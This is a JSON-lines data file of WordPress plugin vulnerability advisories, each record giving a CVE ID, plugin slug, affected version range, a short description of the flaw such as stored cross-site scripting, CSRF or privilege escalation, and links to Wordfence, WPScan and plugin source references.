{"CVE_ID":"CVE-2019-25144","slug":"wp-email-template","versionImpact":"2.2.10","description":"The WP HTML Mail plugin for WordPress is vulnerable to HTML injection in versions up to, and including, 2.2.10 due to insufficient input sanitization. This makes it possible for unauthenticated attackers to inject arbitrary HTML in pages that execute if they can successfully trick a administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/946ba166-3309-4e47-8b6b-d3f017bbfcc8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/946ba166-3309-4e47-8b6b-d3f017bbfcc8?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-vulnerable-to-html-injection\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2495","slug":"greeklish-permalink","versionImpact":"3.3","description":"The Greeklish-permalink WordPress plugin through 3.3 does not implement correct authorization or nonce checks in the cyrtrans_ajax_old AJAX action, allowing unauthenticated and low-privilege users to trigger the plugin's functionality to change Post slugs either directly or through CSRF.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45878983-7e9b-49c2-8f99-4c28aab24f09\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/45878983-7e9b-49c2-8f99-4c28aab24f09\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5565","slug":"shortcode-menu","versionImpact":"3.2","description":"The Shortcode Menu plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'shortmenu' shortcode in versions up to, and including, 3.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/438b9c13-4059-4671-ab4a-07a8cf6f6122?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/438b9c13-4059-4671-ab4a-07a8cf6f6122?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-menu\\\/tags\\\/3.2\\\/shortcode-menu.php#L183\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/shortcode-menu\\\/tags\\\/3.2\\\/shortcode-menu.php#L183\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5724","slug":"photo-video-gallery-master","versionImpact":"1.5.3","description":"The Photo Video Gallery Master plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.5.3 via deserialization of untrusted input 'PVGM_all_photos_details' parameter. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8376556e-ed78-4a0e-a23f-9b2a39db94d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8376556e-ed78-4a0e-a23f-9b2a39db94d9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-video-gallery-master\\\/trunk\\\/photo-video-gallery-master.php#L301\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/photo-video-gallery-master\\\/trunk\\\/photo-video-gallery-master.php#L301\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8276","slug":"wpzoom-portfolio","versionImpact":"1.4.4","description":"The WPZOOM Portfolio Lite \u2013 Filterable Portfolio Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:wpzoom-blocks' Gutenberg block in all versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e7d5503-0a6e-4611-bb7c-b2871be828be?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-portfolio\\\/trunk\\\/build\\\/blocks\\\/portfolio-layouts\\\/index.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpzoom-portfolio\\\/trunk\\\/build\\\/blocks\\\/portfolio-layouts\\\/index.php#L63\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-portfolio\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wpzoom-portfolio\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144394\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3144394\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4541","slug":"nm-visitors","versionImpact":"1.0","description":"The WordPress Visitors plugin for WordPress is vulnerable to Stored Cross-Site Scripting via a spoofed HTTP Header value in versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the nm_vistior page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa15c0a4-c99d-40c9-a654-f3a910460502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa15c0a4-c99d-40c9-a654-f3a910460502?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L105\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L105\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L63\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/nm-visitors\\\/trunk\\\/nm-visitors.php#L63\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8323","slug":"easy-pricing-tables","versionImpact":"3.2.6","description":"The Pricing Tables WordPress Plugin \u2013 Easy Pricing Tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018fontFamily\u2019 attribute in all versions up to, and including, 3.2.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fb1fd3-16aa-467f-b5f6-a6126b05e088?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68fb1fd3-16aa-467f-b5f6-a6126b05e088?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/easy-pricing-tables\\\/trunk\\\/includes\\\/ept-block.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-pricing-tables\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/easy-pricing-tables\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181961\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3181961\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11297","slug":"page-and-post-restriction","versionImpact":"1.3.6","description":"The Page Restriction WordPress (WP) \u2013 Protect WP Pages\/Post plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.3.6 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/page-and-post-restriction\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/page-and-post-restriction\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d12ab8c-d5d0-4e02-986e-e894fae073e5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6d12ab8c-d5d0-4e02-986e-e894fae073e5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5769","slug":"mimo-woocommerce-order-tracking","versionImpact":"1.0.2","description":"The MIMO Woocommerce Order Tracking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.0.2. This makes it possible for authenticated attackers, with Subscriber-level access and above, to add, update, and delete shipper tracking settings.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L137\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L137\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L322\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mimo-woocommerce-order-tracking\\\/tags\\\/1.0.2\\\/mimo-woocommerce-order-tracking.php#L322\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47c666b1-1ac2-4764-bbee-385ec321a580?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47c666b1-1ac2-4764-bbee-385ec321a580?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13056","slug":"dyn-business-panel","versionImpact":"1.0.0","description":"The Dyn Business Panel WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a6acb608-a23e-461d-af48-a6669a45594a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4335","slug":"woocommerce-multiple-addresses","versionImpact":"1.0.7.1","description":"The Woocommerce Multiple Addresses plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 1.0.7.1. This is due to insufficient restrictions on user meta that can be updated through the save_multiple_shipping_addresses() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to elevate their privileges to that of an administrator.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-addresses\\\/trunk\\\/class-woocommerce-multiple-addresses.php#L522\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-multiple-addresses\\\/trunk\\\/class-woocommerce-multiple-addresses.php#L522\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95e74e70-9dc9-4e63-b371-fd2a38692907?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/95e74e70-9dc9-4e63-b371-fd2a38692907?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7168","slug":"better-follow-button-for-jetpack","versionImpact":"8.0","description":"The Better Follow Button for Jetpack WordPress plugin through 8.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/715ded45-04ee-40c1-8acb-bd40d0fe30ec\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/715ded45-04ee-40c1-8acb-bd40d0fe30ec\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4187","slug":"userpro","versionImpact":"5.1.10","description":"The UserPro - Community and User Profile WordPress Plugin plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 5.1.10 via the userpro_fbconnect() function. This makes it possible for unauthenticated attackers to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/userpro-user-profiles-with-social-login\\\/5958681\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2745a40c-b011-4fe5-b2f7-d97ee6972568?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2745a40c-b011-4fe5-b2f7-d97ee6972568?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6053","slug":"zuppler-online-ordering","versionImpact":"2.1.0","description":"The Zuppler Online Ordering plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.1.0. This is due to missing or incorrect nonce validation on the 'zuppler-online-ordering-options' page. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zuppler-online-ordering\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zuppler-online-ordering\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab1dbc7-f188-4c04-9c8b-465ec0a42548?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab1dbc7-f188-4c04-9c8b-465ec0a42548?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8622","slug":"wp-flexible-map","versionImpact":"1.18.0","description":"The Flexible Map plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Flexible Maps shortcode in all versions up to, and including, 1.18.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/webaware\\\/flexible-map\\\/commit\\\/1cbae2fa98e10c82d82a68e2bacfbdb7231117db\",\"name\":\"https:\\\/\\\/github.com\\\/webaware\\\/flexible-map\\\/commit\\\/1cbae2fa98e10c82d82a68e2bacfbdb7231117db\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341890\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3341890\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-flexible-map\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-flexible-map\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde79196-20aa-42f1-b35f-af347bcb6e5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cde79196-20aa-42f1-b35f-af347bcb6e5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4835","slug":"social-sharing-toolkit","versionImpact":"2.6","description":"The Social Sharing Toolkit WordPress plugin through 2.6 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23c22f46-19a2-4a1a-aaef-0a4007eda031\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/23c22f46-19a2-4a1a-aaef-0a4007eda031\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25143","slug":"gdpr-cookie-compliance","versionImpact":"4.0.2","description":"The GDPR Cookie Compliance plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the gdpr_cookie_compliance_reset_settings AJAX action in versions up to, and including, 4.0.2. This makes it possible for authenticated attackers to reset all of the settings.","refs":"[{\"url\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-gdpr-cookie-compliance-security-bypass-4-0-2\\\/\",\"name\":\"https:\\\/\\\/www.acunetix.com\\\/vulnerabilities\\\/web\\\/wordpress-plugin-gdpr-cookie-compliance-security-bypass-4-0-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9116d719-f536-4b8a-9e73-9a8a922f8a35?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9116d719-f536-4b8a-9e73-9a8a922f8a35?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-gdpr-cookie-compliance-plugin-fixed-authenticated-settings-deletion-vulnerability\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-gdpr-cookie-compliance-plugin-fixed-authenticated-settings-deletion-vulnerability\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ac51325-a7f5-4d38-9b41-61855206083d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/5ac51325-a7f5-4d38-9b41-61855206083d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4307","slug":"lock-user-account","versionImpact":"1.0.3","description":"The Lock User Account WordPress plugin through 1.0.3 does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/06f7aa45-b5d0-4afb-95cc-8f1c82f6f8b3\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2020","slug":"calculated-fields-form","versionImpact":"5.1.56","description":"The Calculated Fields Form plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the form page href parameter in all versions up to, and including, 5.1.56 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Exploitation requires the professional version or higher.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45bfa9fb-f35b-4fd4-8553-cf87bf69df6b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calculated-fields-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/calculated-fields-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1324","slug":"qqworld-auto-save-images","versionImpact":"1.9.8","description":"The QQWorld Auto Save Images plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the save_remote_images_get_auto_saved_results() function hooked via a norpriv AJAX in all versions up to, and including, 1.9.8. This makes it possible for unauthenticated attackers to retrieve the contents of arbitrary posts that may not be public.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed82f527-b7af-4466-a977-855f109ed997?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ed82f527-b7af-4466-a977-855f109ed997?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qqworld-auto-save-images\\\/trunk\\\/qqworld-auto-save-images.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qqworld-auto-save-images\\\/trunk\\\/qqworld-auto-save-images.php#L417\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5649","slug":"fusion-slider","versionImpact":"1.6.5","description":"The Universal Slider plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 1.6.5 via deserialization of untrusted input 'fsl_get_gallery_value' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject a PHP Object. No known POP chain is present in the vulnerable software. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f8bd107-5459-4093-8593-deedec6ffcd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8f8bd107-5459-4093-8593-deedec6ffcd6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusion-slider\\\/trunk\\\/fusion-slider.php#L692\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/fusion-slider\\\/trunk\\\/fusion-slider.php#L692\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6770","slug":"v-form","versionImpact":"2.1.5","description":"The Lifetime free Drag & Drop Contact Form Builder for WordPress VForm plugin for WordPress is vulnerable to Stored Cross-Site Scripting in all versions up to, and including, 2.1.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61a63ba6-129a-4ce2-be40-89c2fa44a670?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/61a63ba6-129a-4ce2-be40-89c2fa44a670?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/v-form\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/v-form\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file56\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file56\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file58\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128079\\\/#file58\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128092\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3128092\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10168","slug":"profit-products-tables-for-woocommerce","versionImpact":"1.0.6.4","description":"The Active Products Tables for WooCommerce. Use constructor to create tables plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's woot_button shortcode in all versions up to, and including, 1.0.6.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a13b13e-72d3-43c9-b5ec-d499f3b22091?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/profit-products-tables-for-woocommerce\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182136\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3182136\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
